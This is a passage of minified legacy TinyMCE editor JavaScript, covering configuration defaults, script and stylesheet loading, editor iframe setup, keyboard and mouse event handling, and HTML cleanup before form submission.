silon,918,Zeta,919,Eta,920,Theta,921,Iota,922,Kappa,923,Lambda,924,Mu,925,Nu,926,Xi,927,Omicron,928,Pi,929,Rho,931,Sigma,932,Tau,933,Upsilon,934,Phi,935,Chi,936,Psi,937,Omega,945,alpha,946,beta,947,gamma,948,delta,949,epsilon,950,zeta,951,eta,952,theta,953,iota,954,kappa,955,lambda,956,mu,957,nu,958,xi,959,omicron,960,pi,961,rho,962,sigmaf,963,sigma,964,tau,965,upsilon,966,phi,967,chi,968,psi,969,omega,8501,alefsym,982,piv,8476,real,977,thetasym,978,upsih,8472,weierp,8465,image,8592,larr,8593,uarr,8594,rarr,8595,darr,8596,harr,8629,crarr,8656,lArr,8657,uArr,8658,rArr,8659,dArr,8660,hArr,8756,there4,8834,sub,8835,sup,8836,nsub,8838,sube,8839,supe,8853,oplus,8855,otimes,8869,perp,8901,sdot,8968,lceil,8969,rceil,8970,lfloor,8971,rfloor,9001,lang,9002,rang,9674,loz,9824,spades,9827,clubs,9829,hearts,9830,diams,8194,ensp,8195,emsp,8201,thinsp,8204,zwnj,8205,zwj,8206,lrm,8207,rlm,173,shy,233,eacute,237,iacute,243,oacute,250,uacute,193,Aacute,225,aacute,201,Eacute,205,Iacute,211,Oacute,218,Uacute,221,Yacute,253,yacute");this.defParam("entity_encoding","named");this.defParam("cleanup_callback","");this.defParam("add_unload_trigger",true);this.defParam("ask",false);this.defParam("nowrap",false);this.defParam("auto_resize",false);this.defParam("auto_focus",false);this.defParam("cleanup",true);this.defParam("remove_linebreaks",true);this.defParam("button_tile_map",false);this.defParam("submit_patch",true);this.defParam("browsers","msie,safari,gecko,opera");this.defParam("dialog_type","window");this.defParam("accessibility_warnings",true);this.defParam("merge_styles_invalid_parents","");this.defParam("force_hex_style_colors",true);this.defParam("trim_span_elements",true);this.defParam("convert_fonts_to_spans",false);this.defParam("doctype",'<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">');this.defParam("font_size_classes",'');this.defParam("font_size_style_values",'xx-small,x-small,small,medium,large,x-large,xx-large');this.defParam("event_elements",'a,img');if(this.isMSIE&&this.settings['browsers'].indexOf('msie')==-1)return;if(this.isGecko&&this.settings['browsers'].indexOf('gecko')==-1)return;if(this.isSafari&&this.settings['browsers'].indexOf('safari')==-1)return;if(this.isOpera&&this.settings['browsers'].indexOf('opera')==-1)return;var baseHREF=tinyMCE.settings['document_base_url'];if(baseHREF.indexOf('?')!=-1)baseHREF=baseHREF.substring(0,baseHREF.indexOf('?'));this.settings['base_href']=baseHREF.substring(0,baseHREF.lastIndexOf('/'))+"/";theme=this.settings['theme'];this.blockRegExp=new RegExp("^(h[1-6]|p|div|address|pre|form|table|li|ol|ul|td|blockquote|center|dl|dir|fieldset|form|noscript|noframes|menu|isindex)$","i");this.posKeyCodes=new Array(13,45,36,35,33,34,37,38,39,40);this.uniqueURL='http://tinymce.moxiecode.cp/mce_temp_url';this.settings['theme_href']=tinyMCE.baseURL+"/themes/"+theme;if(!tinyMCE.isMSIE)this.settings['force_br_newlines']=false;if(tinyMCE.getParam("content_css",false)){var cssPath=tinyMCE.getParam("content_css","");if(cssPath.indexOf('://')==-1&&cssPath.charAt(0)!='/')this.settings['content_css']=this.documentBasePath+"/"+cssPath;else this.settings['content_css']=cssPath;}else this.settings['content_css']='';if(tinyMCE.getParam("popups_css",false)){var cssPath=tinyMCE.getParam("popups_css","");if(cssPath.indexOf('://')==-1&&cssPath.charAt(0)!='/')this.settings['popups_css']=this.documentBasePath+"/"+cssPath;else this.settings['popups_css']=cssPath;}else this.settings['popups_css']=tinyMCE.baseURL+"/themes/"+theme+"/css/editor_popup.css";if(tinyMCE.getParam("editor_css",false)){var cssPath=tinyMCE.getParam("editor_css","");if(cssPath.indexOf('://')==-1&&cssPath.charAt(0)!='/')this.settings['editor_css']=this.documentBasePath+"/"+cssPath;else this.settings['editor_css']=cssPath;}else this.settings['editor_css']=tinyMCE.baseURL+"/themes/"+theme+"/css/editor_ui.css";if(tinyMCE.settings['debug']){var msg="Debug: \n";msg+="baseURL: "+this.baseURL+"\n";msg+="documentBasePath: "+this.documentBasePath+"\n";msg+="content_css: "+this.settings['content_css']+"\n";msg+="popups_css: "+this.settings['popups_css']+"\n";msg+="editor_css: "+this.settings['editor_css']+"\n";alert(msg);}this._initCleanup();if(this.configs.length==0){if(this.isSafari&&this.getParam('safari_warning',true))alert("Safari support is very limited and should be considered experimental.\nSo there is no need to even submit bugreports on this early version.\nYou can disable this message by setting: safari_warning option to false");tinyMCE.addEvent(window,"load",TinyMCE.prototype.onLoad);if(tinyMCE.isMSIE){if(tinyMCE.settings['add_unload_trigger']){tinyMCE.addEvent(window,"unload",TinyMCE.prototype.unloadHandler);tinyMCE.addEvent(window.document,"beforeunload",TinyMCE.prototype.unloadHandler);}}else{if(tinyMCE.settings['add_unload_trigger'])tinyMCE.addEvent(window,"unload",function(){tinyMCE.triggerSave(true,true);});}}this.loadScript(tinyMCE.baseURL+'/themes/'+this.settings['theme']+'/editor_template'+tinyMCE.srcMode+'.js');this.loadScript(tinyMCE.baseURL+'/langs/'+this.settings['language']+'.js');this.loadCSS(this.settings['editor_css']);var themePlugins=tinyMCE.getParam('plugins','',true,',');if(this.settings['plugins']!=''){for(var i=0;i<themePlugins.length;i++)this.loadScript(tinyMCE.baseURL+'/plugins/'+themePlugins[i]+'/editor_plugin'+tinyMCE.srcMode+'.js');}settings['index']=this.configs.length;this.configs[this.configs.length]=settings;};TinyMCE.prototype.loadScript=function(url){for(var i=0;i<this.loadedFiles.length;i++){if(this.loadedFiles[i]==url)return;}document.write('<sc'+'ript language="javascript" type="text/javascript" src="'+url+'"></script>');this.loadedFiles[this.loadedFiles.length]=url;};TinyMCE.prototype.loadCSS=function(url){for(var i=0;i<this.loadedFiles.length;i++){if(this.loadedFiles[i]==url)return;}document.write('<link href="'+url+'" rel="stylesheet" type="text/css" />');this.loadedFiles[this.loadedFiles.length]=url;};TinyMCE.prototype.importCSS=function(doc,css_file){if(css_file=='')return;if(typeof(doc.createStyleSheet)=="undefined"){var elm=doc.createElement("link");elm.rel="stylesheet";elm.href=css_file;if((headArr=doc.getElementsByTagName("head"))!=null&&headArr.length>0)headArr[0].appendChild(elm);}else var styleSheet=doc.createStyleSheet(css_file);};TinyMCE.prototype.confirmAdd=function(e,settings){var elm=tinyMCE.isMSIE?event.srcElement:e.target;var elementId=elm.name?elm.name:elm.id;tinyMCE.settings=settings;if(!elm.getAttribute('mce_noask')&&confirm(tinyMCELang['lang_edit_confirm']))tinyMCE.addMCEControl(elm,elementId);elm.setAttribute('mce_noask','true');};TinyMCE.prototype.updateContent=function(form_element_name){var formElement=document.getElementById(form_element_name);for(var n in tinyMCE.instances){var inst=tinyMCE.instances[n];if(!tinyMCE.isInstance(inst))continue;inst.switchSettings();if(inst.formElement==formElement){var doc=inst.getDoc();tinyMCE._setHTML(doc,inst.formElement.value);if(!tinyMCE.isMSIE)doc.body.innerHTML=tinyMCE._cleanupHTML(inst,doc,this.settings,doc.body,inst.visualAid);}}};TinyMCE.prototype.addMCEControl=function(replace_element,form_element_name,target_document){var id="mce_editor_"+tinyMCE.idCounter++;var inst=new TinyMCEControl(tinyMCE.settings);inst.editorId=id;this.instances[id]=inst;inst.onAdd(replace_element,form_element_name,target_document);};TinyMCE.prototype.triggerSave=function(skip_cleanup,skip_callback){for(var n in tinyMCE.instances){var inst=tinyMCE.instances[n];if(!tinyMCE.isInstance(inst))continue;inst.switchSettings();tinyMCE.settings['preformatted']=false;if(typeof(skip_cleanup)=="undefined")skip_cleanup=false;if(typeof(skip_callback)=="undefined")skip_callback=false;tinyMCE._setHTML(inst.getDoc(),inst.getBody().innerHTML);if(inst.settings['cleanup']==false){tinyMCE.handleVisualAid(inst.getBody(),true,false,inst);tinyMCE._setEventsEnabled(inst.getBody(),true);}tinyMCE._customCleanup(inst,"submit_content_dom",inst.contentWindow.document.body);var htm=skip_cleanup?inst.getBody().innerHTML:tinyMCE._cleanupHTML(inst,inst.getDoc(),this.settings,inst.getBody(),this.visualAid,true);htm=tinyMCE._customCleanup(inst,"submit_content",htm);if(tinyMCE.settings["encoding"]=="xml"||tinyMCE.settings["encoding"]=="html")htm=tinyMCE.convertStringToXML(htm);if(!skip_callback&&tinyMCE.settings['save_callback']!="")var content=eval(tinyMCE.settings['save_callback']+"(inst.formTargetElementId,htm,inst.getBody());");if((typeof(content)!="undefined")&&content!=null)htm=content;htm=tinyMCE.regexpReplace(htm,"(","(","gi");htm=tinyMCE.regexpReplace(htm,")",")","gi");htm=tinyMCE.regexpReplace(htm,";",";","gi");htm=tinyMCE.regexpReplace(htm,""",""","gi");htm=tinyMCE.regexpReplace(htm,"^","^","gi");if(inst.formElement)inst.formElement.value=htm;}};TinyMCE.prototype._setEventsEnabled=function(node,state){var events=new Array('onfocus','onblur','onclick','ondblclick','onmousedown','onmouseup','onmouseover','onmousemove','onmouseout','onkeypress','onkeydown','onkeydown','onkeyup');var evs=tinyMCE.settings['event_elements'].split(',');for(var y=0;y<evs.length;y++){var elms=node.getElementsByTagName(evs[y]);for(var i=0;i<elms.length;i++){var event="";for(var x=0;x<events.length;x++){if((event=tinyMCE.getAttrib(elms[i],events[x]))!=''){event=tinyMCE.cleanupEventStr(""+event);if(!state)event="return true;"+event;else event=event.replace(/^return true;/gi,'');elms[i].removeAttribute(events[x]);elms[i].setAttribute(events[x],event);}}}}};TinyMCE.prototype.resetForm=function(form_index){var formObj=document.forms[form_index];for(var n in tinyMCE.instances){var inst=tinyMCE.instances[n];if(!tinyMCE.isInstance(inst))continue;inst.switchSettings();for(var i=0;i<formObj.elements.length;i++){if(inst.formTargetElementId==formObj.elements[i].name){inst.getBody().innerHTML=formObj.elements[i].value;return;}}}};TinyMCE.prototype.execInstanceCommand=function(editor_id,command,user_interface,value,focus){var inst=tinyMCE.getInstanceById(editor_id);if(inst){if(typeof(focus)=="undefined")focus=true;if(focus)inst.contentWindow.focus();inst.autoResetDesignMode();this.selectedElement=inst.getFocusElement();this.selectedInstance=inst;tinyMCE.execCommand(command,user_interface,value);if(tinyMCE.isMSIE&&window.event!=null)tinyMCE.cancelEvent(window.event);}};TinyMCE.prototype.execCommand=function(command,user_interface,value){user_interface=user_interface?user_interface:false;value=value?value:null;if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();switch(command){case 'mceHelp':var template=new Array();template['file']='about.htm';template['width']=480;template['height']=380;tinyMCE.openWindow(template,{tinymce_version:tinyMCE.majorVersion+"."+tinyMCE.minorVersion,tinymce_releasedate:tinyMCE.releaseDate,inline:"yes"});return;case 'mceFocus':var inst=tinyMCE.getInstanceById(value);if(inst)inst.contentWindow.focus();return;case "mceAddControl":case "mceAddEditor":tinyMCE.addMCEControl(tinyMCE._getElementById(value),value);return;case "mceAddFrameControl":tinyMCE.addMCEControl(tinyMCE._getElementById(value),value['element'],value['document']);return;case "mceRemoveControl":case "mceRemoveEditor":tinyMCE.removeMCEControl(value);return;case "mceResetDesignMode":if(!tinyMCE.isMSIE){for(var n in tinyMCE.instances){if(!tinyMCE.isInstance(tinyMCE.instances[n]))continue;try{tinyMCE.instances[n].getDoc().designMode="on";}catch(e){}}}return;}if(this.selectedInstance){this.selectedInstance.execCommand(command,user_interface,value);}else if(tinyMCE.settings['focus_alert'])alert(tinyMCELang['lang_focus_alert']);};TinyMCE.prototype.eventPatch=function(editor_id){if(typeof(tinyMCE)=="undefined")return true;for(var i=0;i<document.frames.length;i++){try{if(document.frames[i].event){var event=document.frames[i].event;if(!event.target)event.target=event.srcElement;TinyMCE.prototype.handleEvent(event);return;}}catch(ex){}}};TinyMCE.prototype.unloadHandler=function(){tinyMCE.triggerSave(true,true);};TinyMCE.prototype.addEventHandlers=function(editor_id){if(tinyMCE.isMSIE){var doc=document.frames[editor_id].document;tinyMCE.addEvent(doc,"keypress",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"keyup",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"keydown",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"mouseup",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"click",TinyMCE.prototype.eventPatch);}else{var inst=tinyMCE.instances[editor_id];var doc=inst.getDoc();inst.switchSettings();tinyMCE.addEvent(doc,"keypress",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"keydown",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"keyup",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"click",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"mouseup",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"mousedown",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"focus",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"blur",tinyMCE.handleEvent);eval('try { doc.designMode = "On"; } catch(e) {}');}};TinyMCE.prototype._createIFrame=function(replace_element){var iframe=document.createElement("iframe");var id=replace_element.getAttribute("id");var aw,ah;aw=""+tinyMCE.settings['area_width'];ah=""+tinyMCE.settings['area_height'];if(aw.indexOf('%')==-1){aw=parseInt(aw);aw=aw<0?300:aw;aw=aw+"px";}if(ah.indexOf('%')==-1){ah=parseInt(ah);ah=ah<0?240:ah;ah=ah+"px";}iframe.setAttribute("id",id);iframe.setAttribute("border","0");iframe.setAttribute("frameBorder","0");iframe.setAttribute("marginWidth","0");iframe.setAttribute("marginHeight","0");iframe.setAttribute("leftMargin","0");iframe.setAttribute("topMargin","0");iframe.setAttribute("width",aw);iframe.setAttribute("height",ah);iframe.setAttribute("allowtransparency","true");if(tinyMCE.settings["auto_resize"])iframe.setAttribute("scrolling","no");if(tinyMCE.isMSIE&&!tinyMCE.isOpera)iframe.setAttribute("src",this.settings['default_document']);iframe.style.width=aw;iframe.style.height=ah;if(tinyMCE.isMSIE&&!tinyMCE.isOpera)replace_element.outerHTML=iframe.outerHTML;else replace_element.parentNode.replaceChild(iframe,replace_element);if(tinyMCE.isMSIE)return window.frames[id];else return iframe;};TinyMCE.prototype.setupContent=function(editor_id){var inst=tinyMCE.instances[editor_id];var doc=inst.getDoc();var head=doc.getElementsByTagName('head').item(0);var content=inst.startContent;tinyMCE.operaOpacityCounter=100*tinyMCE.idCounter;inst.switchSettings();if(!tinyMCE.isMSIE&&doc.title!="blank_page"){try{doc.location.href=tinyMCE.baseURL+"/blank.htm";}catch(ex){}window.setTimeout("tinyMCE.setupContent('"+editor_id+"');",1000);return;}if(!head){window.setTimeout("tinyMCE.setupContent('"+editor_id+"');",10);return;}tinyMCE.importCSS(inst.getDoc(),tinyMCE.baseURL+"/themes/"+inst.settings['theme']+"/css/editor_content.css");tinyMCE.importCSS(inst.getDoc(),inst.settings['content_css']);tinyMCE.executeCallback('init_instance_callback','_initInstance',0,inst);if(tinyMCE.getParam("convert_fonts_to_spans"))inst.getDoc().body.setAttribute('id','mceSpanFonts');if(tinyMCE.settings['nowrap'])doc.body.style.whiteSpace="nowrap";doc.body.dir=this.settings['directionality'];doc.editorId=editor_id;if(!tinyMCE.isMSIE)doc.documentElement.editorId=editor_id;var base=doc.createElement("base");base.setAttribute('href',tinyMCE.settings['base_href']);head.appendChild(base);if(tinyMCE.settings['convert_newlines_to_brs']){content=tinyMCE.regexpReplace(content,"\r\n","<br />","gi");content=tinyMCE.regexpReplace(content,"\r","<br />","gi");content=tinyMCE.regexpReplace(content,"\n","<br />","gi");}content=tinyMCE._customCleanup(inst,"insert_to_editor",content);if(tinyMCE.isMSIE){window.setInterval('try{tinyMCE.getCSSClasses(document.frames["'+editor_id+'"].document, "'+editor_id+'");}catch(e){}',500);if(tinyMCE.settings["force_br_newlines"])document.frames[editor_id].document.styleSheets[0].addRule("p","margin: 0px;");var body=document.frames[editor_id].document.body;tinyMCE.addEvent(body,"beforepaste",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(body,"beforecut",TinyMCE.prototype.eventPatch);body.editorId=editor_id;}content=tinyMCE.cleanupHTMLCode(content);if(!tinyMCE.isMSIE){var contentElement=inst.getDoc().createElement("body");var doc=inst.getDoc();contentElement.innerHTML=content;if(tinyMCE.isGecko&&tinyMCE.settings['remove_lt_gt'])content=content.replace(new RegExp('<>','g'),"");if(tinyMCE.settings['cleanup_on_startup'])tinyMCE.setInnerHTML(inst.getBody(),tinyMCE._cleanupHTML(inst,doc,this.settings,contentElement));else{content=tinyMCE.regexpReplace(content,"<strong","<b","gi");content=tinyMCE.regexpReplace(content,"<em(/?)>","<i$1>","gi");content=tinyMCE.regexpReplace(content,"<em ","<i ","gi");content=tinyMCE.regexpReplace(content,"</strong>","</b>","gi");content=tinyMCE.regexpReplace(content,"</em>","</i>","gi");tinyMCE.setInnerHTML(inst.getBody(),content);}inst.convertAllRelativeURLs();}else{if(tinyMCE.settings['cleanup_on_startup']){tinyMCE._setHTML(inst.getDoc(),content);eval('try {tinyMCE.setInnerHTML(inst.getBody(), tinyMCE._cleanupHTML(inst, inst.contentDocument, this.settings, inst.getBody());} catch(e) {}');}else tinyMCE._setHTML(inst.getDoc(),content);}var parentElm=document.getElementById(inst.editorId+'_parent');if(parentElm.lastChild.nodeName.toLowerCase()=="input")inst.formElement=parentElm.lastChild;else inst.formElement=parentElm.nextSibling;tinyMCE.handleVisualAid(inst.getBody(),true,tinyMCE.settings['visual'],inst);tinyMCE.executeCallback('setupcontent_callback','_setupContent',0,editor_id,inst.getBody(),inst.getDoc());if(!tinyMCE.isMSIE)TinyMCE.prototype.addEventHandlers(editor_id);if(tinyMCE.isMSIE)tinyMCE.addEvent(inst.getBody(),"blur",TinyMCE.prototype.eventPatch);tinyMCE.selectedInstance=inst;tinyMCE.selectedElement=inst.contentWindow.document.body;tinyMCE.triggerNodeChange(false,true);tinyMCE._customCleanup(inst,"insert_to_editor_dom",inst.getBody());tinyMCE._customCleanup(inst,"setup_content_dom",inst.getBody());tinyMCE._setEventsEnabled(inst.getBody(),false);tinyMCE.cleanupAnchors(inst.getDoc());if(tinyMCE.getParam("convert_fonts_to_spans"))tinyMCE.convertSpansToFonts(inst.getDoc());inst.startContent=tinyMCE.trim(inst.getBody().innerHTML);inst.undoLevels[inst.undoLevels.length]=inst.startContent;tinyMCE.operaOpacityCounter=-1;};TinyMCE.prototype.cleanupHTMLCode=function(s){s=s.replace(/<p\/>/gi,'<p> </p>');s=s.replace(/<p>\s*<\/p>/gi,'<p> </p>');s=s.replace(/<(h[1-6]|p|div|address|pre|form|table|li|ol|ul|td|b|em|strong|i|strike|u|span|a|ul|ol|li|blockquote)([^\\|>]*?)\/>/gi,'<$1$2></$1>');s=s.replace(new RegExp('\\s+></','gi'),'></');if(tinyMCE.isMSIE)s=s.replace(/<p><hr\/><\/p>/gi,"<hr>");s=s.replace(new RegExp('(href=\"?)(\\s*?#)','gi'),'$1'+tinyMCE.settings['document_base_url']+"#");return s;};TinyMCE.prototype.cancelEvent=function(e){if(tinyMCE.isMSIE){e.returnValue=false;e.cancelBubble=true;}else e.preventDefault();};TinyMCE.prototype.removeTinyMCEFormElements=function(form_obj){for(var i=0;i<form_obj.elements.length;i++){var elementId=form_obj.elements[i].name?form_obj.elements[i].name:form_obj.elements[i].id;if(elementId.indexOf('mce_editor_')==0)form_obj.elements[i].disabled=true;}};TinyMCE.prototype.accessibleEventHandler=function(e){var win=this._win;e=tinyMCE.isMSIE?win.event:e;var elm=tinyMCE.isMSIE?e.srcElement:e.target;if(elm.nodeName=="SELECT"&&!elm.oldonchange){elm.oldonchange=elm.onchange;elm.onchange=null;}if(e.keyCode==13||e.keyCode==32){elm.onchange=elm.oldonchange;elm.onchange();elm.oldonchange=null;tinyMCE.cancelEvent(e);}};TinyMCE.prototype.addSelectAccessibility=function(e,select,win){if(!select._isAccessible){select.onkeydown=tinyMCE.accessibleEventHandler;select._isAccessible=true;select._win=win;}};TinyMCE.prototype.handleEvent=function(e){if(typeof(tinyMCE)=="undefined")return true;switch(e.type){case "blur":if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.execCommand('mceEndTyping');return;case "submit":tinyMCE.removeTinyMCEFormElements(tinyMCE.isMSIE?window.event.srcElement:e.target);tinyMCE.triggerSave();tinyMCE.isNotDirty=true;return;case "reset":var formObj=tinyMCE.isMSIE?window.event.srcElement:e.target;for(var i=0;i<document.forms.length;i++){if(document.forms[i]==formObj)window.setTimeout('tinyMCE.resetForm('+i+');',10);}return;case "keypress":if(e.target.editorId){tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];}else{if(e.target.ownerDocument.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.ownerDocument.editorId];}if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();if(tinyMCE.isGecko&&tinyMCE.settings['force_p_newlines']&&e.keyCode==13&&!e.shiftKey){if(tinyMCE.selectedInstance._insertPara(e)){tinyMCE.execCommand("mceAddUndoLevel");tinyMCE.cancelEvent(e);return false;}}if(tinyMCE.isGecko&&tinyMCE.settings['force_p_newlines']&&(e.keyCode==8||e.keyCode==46)&&!e.shiftKey){if(tinyMCE.selectedInstance._handleBackSpace(e.type)){tinyMCE.execCommand("mceAddUndoLevel");e.preventDefault();return false;}}if(tinyMCE.isGecko&&(e.ctrlKey&&!e.altKey)&&tinyMCE.settings['custom_undo_redo']){if(tinyMCE.settings['custom_undo_redo_keyboard_shortcuts']){if(e.charCode==122){tinyMCE.selectedInstance.execCommand("Undo");e.preventDefault();return false;}if(e.charCode==121){tinyMCE.selectedInstance.execCommand("Redo");e.preventDefault();return false;}}if(e.charCode==98){tinyMCE.selectedInstance.execCommand("Bold");e.preventDefault();return false;}if(e.charCode==105){tinyMCE.selectedInstance.execCommand("Italic");e.preventDefault();return false;}if(e.charCode==117){tinyMCE.selectedInstance.execCommand("Underline");e.preventDefault();return false;}}if(tinyMCE.isMSIE&&tinyMCE.settings['force_br_newlines']&&e.keyCode==13){if(e.target.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];if(tinyMCE.selectedInstance){var sel=tinyMCE.selectedInstance.getDoc().selection;var rng=sel.createRange();if(tinyMCE.getParentElement(rng.parentElement(),"li")!=null)return false;e.returnValue=false;e.cancelBubble=true;rng.pasteHTML("<br />");rng.collapse(false);rng.select();tinyMCE.execCommand("mceAddUndoLevel");tinyMCE.triggerNodeChange(false);return false;}}if(e.keyCode==8||e.keyCode==46){tinyMCE.selectedElement=e.target;tinyMCE.linkElement=tinyMCE.getParentElement(e.target,"a");tinyMCE.imgElement=tinyMCE.getParentElement(e.target,"img");tinyMCE.triggerNodeChange(false);}return false;break;case "keyup":case "keydown":if(e.target.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];else return;if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();var inst=tinyMCE.selectedInstance;if(tinyMCE.isGecko&&tinyMCE.settings['force_p_newlines']&&(e.keyCode==8||e.keyCode==46)&&!e.shiftKey){if(tinyMCE.selectedInstance._handleBackSpace(e.type)){tinyMCE.execCommand("mceAddUndoLevel");e.preventDefault();return false;}}tinyMCE.selectedElement=null;tinyMCE.selectedNode=null;var elm=tinyMCE.selectedInstance.getFocusElement();tinyMCE.linkElement=tinyMCE.getParentElement(elm,"a");tinyMCE.imgElement=tinyMCE.getParentElement(elm,"img");tinyMCE.selectedElement=elm;if(tinyMCE.isGecko&&e.type=="keyup"&&e.keyCode==9)tinyMCE.handleVisualAid(tinyMCE.selectedInstance.getBody(),true,tinyMCE.settings['visual'],tinyMCE.selectedInstance);if(tinyMCE.isGecko&&tinyMCE.settings['document_base_url']!=""+document.location.href&&e.type=="keyup"&&e.ctrlKey&&e.keyCode==86)tinyMCE.selectedInstance.fixBrokenURLs();if(tinyMCE.isMSIE&&e.type=="keydown"&&e.keyCode==13)tinyMCE.enterKeyElement=tinyMCE.selectedInstance.getFocusElement();if(tinyMCE.isMSIE&&e.type=="keyup"&&e.keyCode==13){var elm=tinyMCE.enterKeyElement;if(elm){var re=new RegExp('^HR|IMG|BR$','g');var dre=new RegExp('^H[1-6]$','g');if(!elm.hasChildNodes()&&!re.test(elm.nodeName)){if(dre.test(elm.nodeName))elm.innerHTML=" ";else elm.innerHTML=" ";}}}var keys=tinyMCE.posKeyCodes;var posKey=false;for(var i=0;i<keys.length;i++){if(keys[i]==e.keyCode){posKey=true;break;}}if(tinyMCE.isMSIE&&tinyMCE.settings['custom_undo_redo']){var keys=new Array(8,46);for(var i=0;i<keys.length;i++){if(keys[i]==e.keyCode){if(e.type=="keyup")tinyMCE.triggerNodeChange(false);}}if(tinyMCE.settings['custom_undo_redo_keyboard_shortcuts']){if(e.keyCode==90&&(e.ctrlKey&&!e.altKey)&&e.type=="keydown"){tinyMCE.selectedInstance.execCommand("Undo");tinyMCE.triggerNodeChange(false);}if(e.keyCode==89&&(e.ctrlKey&&!e.altKey)&&e.type=="keydown"){tinyMCE.selectedInstance.execCommand("Redo");tinyMCE.triggerNodeChange(false);}if((e.keyCode==90||e.keyCode==89)&&(e.ctrlKey&&!e.altKey)){e.returnValue=false;e.cancelBubble=true;return false;}}}if(!posKey&&e.type=="keyup")tinyMCE.execCommand("mceStartTyping");if(e.type=="keyup"&&(posKey||e.ctrlKey))tinyMCE.execCommand("mceEndTyping");if(posKey&&e.type=="keyup")tinyMCE.triggerNodeChange(false);if(tinyMCE.isMSIE&&e.ctrlKey)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);break;case "mousedown":case "mouseup":case "click":case "focus":if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();var targetBody=tinyMCE.getParentElement(e.target,"body");for(var instanceName in tinyMCE.instances){if(!tinyMCE.isInstance(tinyMCE.instances[instanceName]))continue;var inst=tinyMCE.instances[instanceName];inst.autoResetDesignMode();if(inst.getBody()==targetBody){tinyMCE.selectedInstance=inst;tinyMCE.selectedElement=e.target;tinyMCE.linkElement=tinyMCE.getParentElement(tinyMCE.selectedElement,"a");tinyMCE.imgElement=tinyMCE.getParentElement(tinyMCE.selectedElement,"img");break;}}if(tinyMCE.isSafari){tinyMCE.selectedInstance.lastSafariSelection=tinyMCE.selectedInstance.getBookmark();tinyMCE.selectedInstance.lastSafariSelectedElement=tinyMCE.selectedElement;var lnk=tinyMCE.getParentElement(tinyMCE.selectedElement,"a");if(lnk&&e.type=="mousedown"){lnk.setAttribute("mce_real_href",lnk.getAttribute("href"));lnk.setAttribute("href","javascript:void(0);");}if(lnk&&e.type=="click"){window.setTimeout(function(){lnk.setAttribute("href",lnk.getAttribute("mce_real_href"));lnk.removeAttribute("mce_real_href");},10);}}if(e.type!="focus")tinyMCE.selectedNode=null;tinyMCE.triggerNodeChange(false);tinyMCE.execCommand("mceEndTyping");if(e.type=="mouseup")tinyMCE.execCommand("mceAddUndoLevel");if(!tinyMCE.selectedInstance&&e.target.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];if(tinyMCE.isGecko&&tinyMCE.settings['document_base_url']!=""+document.location.href)window.setTimeout('tinyMCE.getInstanceById("'+inst.editorId+'").fixBrokenURLs();',10);return false;break;}};TinyMCE.prototype.switchClass=function(element,class_name,lock_state){var lockChanged=false;if(typeof(lock_state)!="undefined"&&element!=null){element.classLock=lock_state;lockChanged=true;}if(element!=null&&(lockChanged||!element.classLock)){element.oldClassName=element.className;element.className=class_name;}};TinyMCE.prototype.restoreAndSwitchClass=function(element,class_name){if(element!=null&&!element.classLock){this.restoreClass(element);this.switchClass(element,class_name);}};TinyMCE.prototype.switchClassSticky=function(element_name,class_name,lock_state){var element,lockChanged=false;if(!this.stickyClassesLookup[element_name])this.stickyClassesLookup[element_name]=document.getElementById(element_name);element=this.stickyClassesLookup[element_name];if(typeof(lock_state)!="undefined"&&element!=null){element.classLock=lock_state;lockChanged=true;}if(element!=null&&(lockChanged||!element.classLock)){element.className=class_name;element.oldClassName=class_name;if(tinyMCE.isOpera){if(class_name=="mceButtonDisabled"){var suffix="";if(!element.mceOldSrc)element.mceOldSrc=element.src;if(this.operaOpacityCounter>-1)suffix='?rnd='+this.operaOpacityCounter++;element.src=tinyMCE.baseURL+"/themes/"+tinyMCE.getParam("theme")+"/images/opacity.png"+suffix;element.style.backgroundImage="url('"+element.mceOldSrc+"')";}else{if(element.mceOldSrc){element.src=element.mceOldSrc;element.parentNode.style.backgroundImage="";element.mceOldSrc=null;}}}}};TinyMCE.prototype.restoreClass=function(element){if(element!=null&&element.oldClassName&&!element.classLock){element.className=element.oldClassName;element.oldClassName=null;}};TinyMCE.prototype.setClassLock=function(element,lock_state){if(element!=null)element.classLock=lock_state;};TinyMCE.prototype.addEvent=function(obj,name,handler){if(tinyMCE.isMSIE){obj.attachEvent("on"+name,handler);}else obj.addEventListener(name,handler,false);};TinyMCE.prototype.submitPatch=function(){tinyMCE.removeTinyMCEFormElements(this);tinyMCE.triggerSave();this.mceOldSubmit();tinyMCE.isNotDirty=true;};TinyMCE.prototype.onLoad=function(){for(var c=0;c<tinyMCE.configs.length;c++){tinyMCE.settings=tinyMCE.configs[c];var selector=tinyMCE.getParam("editor_selector");var deselector=tinyMCE.getParam("editor_deselector");var elementRefAr=new Array();if(document.forms&&tinyMCE.settings['add_form_submit_trigger']&&!tinyMCE.submitTriggers){for(var i=0;i<document.forms.length;i++){var form=document.forms[i];tinyMCE.addEvent(form,"submit",TinyMCE.prototype.handleEvent);tinyMCE.addEvent(form,"reset",TinyMCE.prototype.handleEvent);tinyMCE.submitTriggers=true;if(tinyMCE.settings['submit_patch']){try{form.mceOldSubmit=form.submit;form.submit=TinyMCE.prototype.submitPatch;}catch(e){}}}}var mode=tinyMCE.settings['mode'];switch(mode){case "exact":var elements=tinyMCE.getParam('elements','',true,',');for(var 